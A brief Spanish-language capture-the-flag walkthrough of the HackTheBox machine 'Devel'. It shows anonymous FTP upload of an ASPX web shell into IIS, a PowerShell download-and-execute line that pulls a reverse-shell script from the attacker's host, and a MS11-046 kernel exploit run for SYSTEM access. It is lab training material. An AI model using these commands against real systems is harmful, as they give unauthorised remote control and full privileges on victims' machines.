HackTheBox Easy Windows FTP ASPX IIS MS11-046

Devel

FTP anonimo permite subir una ASPX webshell al directorio IIS; escalada con MS11-046 a SYSTEM.

cat4clysm
Herramientas utilizadas
nmap ftp msfvenom netcat

Scanning

root@kali:~$
nmap -sC -sV -p 21,80 -Pn -n 10.10.10.5 -oN targeted
nmap scan

FTP Anonimo - Subir ASPX Shell

root@kali:~$
cp /usr/share/SecLists/Web-Shells/FuzzDB/cmd.aspx .
ftp 10.10.10.5
ftp login
put cmd.aspx
cmd.aspx uploaded

Reverse Shell via PowerShell

root@kali:~$
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
sudo python3 -m http.server 80

Desde cmd.aspx ejecutamos:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.27/Invoke-PowerShellTcp.ps1')
powershell shell

Escalada de Privilegios - MS11-046

Buscamos 'Windows 7 Build 7600 exploit' e identificamos MS11-046:

windows version
root@kali:~$
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS11-046/ms11-046.exe
ftp 10.10.10.5
binary
put ms11-046.exe
cd C:\inetpub\wwwroot
.\ms11-046.exe
type C:\Users\babis\Desktop\user.txt.txt
type C:\Users\Administrator\Desktop\root.txt.txt

Lecciones aprendidas